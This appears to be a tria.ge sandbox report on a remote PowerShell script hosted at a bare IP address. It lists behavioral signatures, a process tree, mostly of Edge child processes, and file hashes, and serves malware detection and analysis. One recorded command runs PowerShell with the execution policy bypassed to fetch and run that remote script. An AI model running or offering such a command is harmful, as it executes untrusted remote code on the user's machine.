Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
36s -
max time network
40s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
18/07/2023, 08:11
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://159.223.10.199:8000/evmet.ps1
Resource
win10v2004-20230703-en
General
-
Target
http://159.223.10.199:8000/evmet.ps1
Malware Config
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1420546310-613437930-2990200354-1000\{1ACDD382-AF98-4D4F-BB23-6B40DC6A4259} msedge.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1124 powershell.exe 408 msedge.exe 408 msedge.exe 4968 msedge.exe 4968 msedge.exe 4500 msedge.exe 4500 msedge.exe 2668 identity_helper.exe 2668 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
pid Process 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1124 powershell.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 1468 helppane.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe 4968 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1468 helppane.exe 1468 helppane.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1468 wrote to memory of 4968 1468 helppane.exe 96 PID 1468 wrote to memory of 4968 1468 helppane.exe 96 PID 4968 wrote to memory of 3960 4968 msedge.exe 97 PID 4968 wrote to memory of 3960 4968 msedge.exe 97 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 2544 4968 msedge.exe 99 PID 4968 wrote to memory of 408 4968 msedge.exe 98 PID 4968 wrote to memory of 408 4968 msedge.exe 98 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100 PID 4968 wrote to memory of 2096 4968 msedge.exe 100
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File http://159.223.10.199:8000/evmet.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
C:\Windows\helppane.exeC:\Windows\helppane.exe -Embedding1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=5288822⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x7c,0x108,0x7ffb91aa46f8,0x7ffb91aa4708,0x7ffb91aa47183⤵PID:3960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:23⤵PID:2544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:83⤵PID:2096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:13⤵PID:3564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:13⤵PID:2664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:13⤵PID:2492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:13⤵PID:4304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4904 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4912 /prefetch:83⤵PID:4264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:13⤵PID:4216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:13⤵PID:448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:13⤵PID:5264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:13⤵PID:5368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:13⤵PID:5408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:13⤵PID:5776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:13⤵PID:5940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:13⤵PID:6064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:13⤵PID:5244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:13⤵PID:5904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:13⤵PID:1464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:13⤵PID:480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 /prefetch:83⤵PID:2720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:2668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:13⤵PID:5848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:13⤵PID:5884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17797578959924115207,15099189514298909616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:13⤵PID:5228
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1004
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4708
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5fc99b0086d7714fd471ed4acc862ccc0
SHA139a3c43c97f778d67413a023d66e8e930d0e2314
SHA25645ef01f81605bfd96126d5520c5aa0304c7fa7d5fdb3e4d5b2dd2bf84e2afd96
SHA512c308fa3eda9235d67a506a5f058fefb9a769ec01d7b0d4f5a2397892cc4f8155301c55c1fac23bebacdd087ab3f47f1eacc9ff88eff4115a7d67aa7b1d6581a8
-
Filesize
22KB
MD568f3c668bd3369699a9e554c2294ff29
SHA1b06cb70c310a429d5000361e3ab7bb07146b23f6
SHA256392a288aaa8044b0344dc11b86a8291ec3ec7094f4efa773666e7048a5f98576
SHA51249a67e794d300020df38d2ca7e2534dc13002949ed546460cafbde8ce653adeed8e77fa86215634ef2c462aa40e48c8832066837fa1104fca1764c1d17167012
-
Filesize
22KB
MD5438d99fea4932ea1fc763b647853d1fb
SHA148c5c7d6c71ef140ed4c84cda82da40a76fcb579
SHA2568bd123bedaa8734ca3ba2a6a16b462b045e5a6d1b6a4718b5ff495663e87ebcd
SHA5124ce4110e865d87ab0cdc8e973cff53931f26e780eaab96eb923c20689ccc5f8f04d3ddf58de93180b78de8c6ee97424d66d64d8ff01a29a58e7bd3d44705445f
-
Filesize
30KB
MD501ed540a1edc0b1cae4b91ef5d576be3
SHA10f4aa0ea331348a4c2bca0f3898dd681646455c4
SHA256da348028c4b581592016ee99ec4ee38cdaaac87d2c0317962c52c18a9338a101
SHA512068128ccce22c4b9771e61db2126ffcac2407eeb036502b98feb89e20f8e0f32c35d475322f4ed6d5457832be47e0841b190c14651fef6f3a9bb91f6dc1561ee
-
Filesize
49KB
MD50888bb7879080ed7ef4877114adbcbd7
SHA1569b99bf87b5e4bc7775ca1a2a31f17b67700934
SHA256c4b89f81286722cbffd3a68691a45b11c6e71110c55de310a98a6c3227c07d18
SHA5126604639d8dd7d01b8e86601e8a7bf87dfd5b24623049be9281c530548bbfdf5a0dc46cd8c186022d3fcae3e6b47f6bd5a49aa895e4050207c51a1ba50641df7a
-
Filesize
24KB
MD5a2a5b10997fa665d4711538379d21aa0
SHA17f13e3156d1132232010dd74a5bef212d6c77cae
SHA256db8ebb02340aa91a55b3f9025078c51d2bd59e6f1b469adca0b4f74b1532b7a8
SHA5126dc933138ded551630ecd106d4c35cf06ab488a299cbb95a05652b5377af83ebbf5ec8c8c3b99842cde8f5f627af1c09cc38f9d5e213178be85e04017b60a9de
-
Filesize
85KB
MD568cdafbfc1f62d2dd0d588e8913943b5
SHA1a04309c86b5d2ddaae92ff0cf15cc633531fa4b9
SHA256c4ad786a7c72f962ca7948d192e88987db64186fa63d8cd0ba81657941265c5d
SHA512393d8593049647157b111e2c1b453067e53c09595025ebf83d75dc42bcd1e3bced153071cb32eeb02998a9820db87b2eee92d97d4e4298ebe56e7ae5e03a342a
-
Filesize
35KB
MD5b51cd25f5df4d2f99d876051922b0045
SHA1474caa81e36b4e29dc87554bc8686c50a4fe859d
SHA25665e4a299d4f422b828b239b8344d11289600c89745f05a2e36a9befb3179aca0
SHA5121cd5900c27b1ba5bd43fa6d2bc5c874af7310b9e7444a381f7ec815b99145dbad83f4362d267649df8464f6289333e10a6557de1c9c7d837afc495fc047eb000
-
Filesize
79KB
MD5e51f388b62281af5b4a9193cce419941
SHA1364f3d737462b7fd063107fe2c580fdb9781a45a
SHA256348404a68791474349e35bd7d1980abcbf06db85132286e45ad4f204d10b5f2c
SHA5121755816c26d013d7b610bab515200b0f1f2bd2be0c4a8a099c3f8aff2d898882fd3bcf1163d0378916f4c5c24222df5dd7b18df0c8e5bf2a0ebef891215f148e
-
Filesize
213KB
MD5cc521a7256e94d43df24fc6ccf1cabc9
SHA1783de4bf06ccd26af4eb56f6d8a7473a551c3135
SHA2560e379b6c1a7940b9d0cb6277c2b30e71e228bdc4f80417e785dd1b54ce122662
SHA512553268758ecca7a455f357bda6fdef344740f98c836e88096550c8ffecf3e3b7682f1a6c17eb0b6fb79ac8fbfae733cf9e1321c8da44e54b2aa882cf92eff5b3
-
Filesize
28KB
MD5f04217f47619ac51664e7a65b3f77b48
SHA1c32c07c33ba8850f282492b2bd38be170b556541
SHA2565975dea100208142bb9cbd2ae15e1bae43213598a2a4496e42c4baec3bd50a61
SHA512baee23291cbe16489213a42eda355edbc0db78a8fa8646388bfcc9cf07911e7833bc2af58d3150127f263679f1025c955de97c66d2072f82d8e433f6033fd6e3
-
Filesize
17KB
MD50cedbb5e7888349e4705a66ede3dd01c
SHA1bff3c70dbd94c866bdefc48e7bba1d8f359577ac
SHA25612d95d8d400eeafa0258e9d29d6ea5ef0ec9cfc1410b75e47976fcb3f92082b0
SHA51202738acfac17a4f51eeff92f6fd001a4c874b077e3a31b079d9a3e84d551292a26a9d32ee2970c933acc716a785c843ea7abf51620c69251e7ee674a7ef28acd
-
Filesize
58KB
MD5d64e27c255582bfdf91a0031e15098fc
SHA1efd8f560e9959483bf5b3ac2f32d45e706daac7c
SHA2569aba33a3527ff6136556534082c289e8ad7d4428c3b79d3fae7c31e023a7b967
SHA512cdc6d2656b9734bde82a2e7edbdcb4f6baae4cb447f0f7052090da822327aa1324907f2d789c4391cc342cdc483d499c1be981b8c74bf7322be05ed3795e5d4d
-
Filesize
25KB
MD5d0263dc03be4c393a90bda733c57d6db
SHA18a032b6deab53a33234c735133b48518f8643b92
SHA25622b4df5c33045b645cafa45b04685f4752e471a2e933bff5bf14324d87deee12
SHA5129511bef269ae0797addf4cd6f2fec4ad0c4a4e06b3e5bf6138c7678a203022ac4818c7d446d154594504c947da3061030e82472d2708149c0709b1a070fdd0e3
-
Filesize
23KB
MD583ee9cb183a0382a6b9ca0646dccd04b
SHA15d2760f85a7cc1c2ee226a39b0623271dbecf2bf
SHA256190ad4090acc1e823f53b56a2bfd7088ddedea746b729d41426311916e722ff5
SHA512481e47e047308d568d9fdeed7625e082819b51ea012e888e503ed7552780a83521ed63d9115b9f6a8d9e963a7d17072878fb389db2aa5b2efd8c2f17fe70b21e
-
Filesize
176KB
MD59c80c2031558ed880204136988d91023
SHA151a71449bd0ccfeb45fa3e935b0be720e545ce26
SHA256ef3c88944ac753a0ea2b356c9cb294b43d0619e9419589145bb481b09d9aa969
SHA5123ffca1e446b1d223fa34c4dfb8e0a1a614be7feea1dbcefb349ae3f05e7f1d6bbbe12b1f6e7868eb7571fe9392d96cdec04a9f2a86fc9eb87ffad3f407780e14
-
Filesize
256KB
MD56dfa4adb07e230eb92a44386cf37a260
SHA1c739b1819ce71060b4d9fba1a6c5c93de6610ba6
SHA25688cb61ce72cfc2b148c9d0e0da740c1164e01511347ff2f027aa3fea444c384b
SHA512a2294edcbd2f0bf8689ab0ceb1ad201933803dccae8f245da9b7d4020e901e7a75a43526265fd66fc66fba9cc1774a5faed374acc819648c716f18e2b5778db7
-
Filesize
33KB
MD5a6c3385ecfd40d6a69f972893af8e3be
SHA166c3572e7024c004aa3681a90f4d3d69d2dd84d6
SHA256dfa8cd2315c5cdeaba2548eb4cba9ebde70d458b1346d1b9509ff58d97b4277a
SHA512e07d8c1eb00614c4e5919e0d9b7de2ea4558fe8e2caaa561017195b79c05fac706e3916400edd511f0c78f945c94e10c06ca065cc780366f2885abed7f67a3df
-
Filesize
32KB
MD5f80b5c4eed9f09d1930e9b76b9008244
SHA1e3136129e87daa377854fe948ddcc5b88e8baf42
SHA2569727db239709c756bc11165d23e91c4db5c6b299d4fb684a872b95beee108600
SHA5129fc4007523ced3cb91cf2176ac3369d8c05facfa71c153b92bd78ec658785b7b612c21d974d0eec3b82e88f16d4c5f9d3830d378aebcfd2f602114ec4c2de4c1
-
Filesize
17KB
MD5eb4cf7babe624ca5751ffc0bd0029da7
SHA1d9014486ade1ac5c32014c707acc93b0eb51d0b4
SHA2563f66a84c6c0db43726cd535a95616bf062cc999f9d872768cfe5cf20e3452657
SHA512feddc8a9a16969b0965312097a2daac2cc9f2f19609574018a6a779a21af933a2881b77d70dc104d207389f951ba60e6f8d3b04ffc87826d18b84db684713640
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize2KB
MD5a98d4d709dd1de6b5f83c658ddd675f2
SHA1a48ba9c36f5fdd3e3a0c6aa0b0df9e95958c591a
SHA256d6adb217f70f99609f563d85c57096dd0de09a6a0bad92c5d24ed247bdd50c2d
SHA512b1b11792dff1a778c1b4e87b3b385737fb5a7a2df2ab4f8c288bad909980d27ba8c5a2068ea258925fc139a6b8ba6863beb518cba37e0a57292371da80b4ecb6
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
1KB
MD550e21e3dfea182a023eacf0a01d2858d
SHA1b8d347f7275b72c7b0f0c964982e9234d806b751
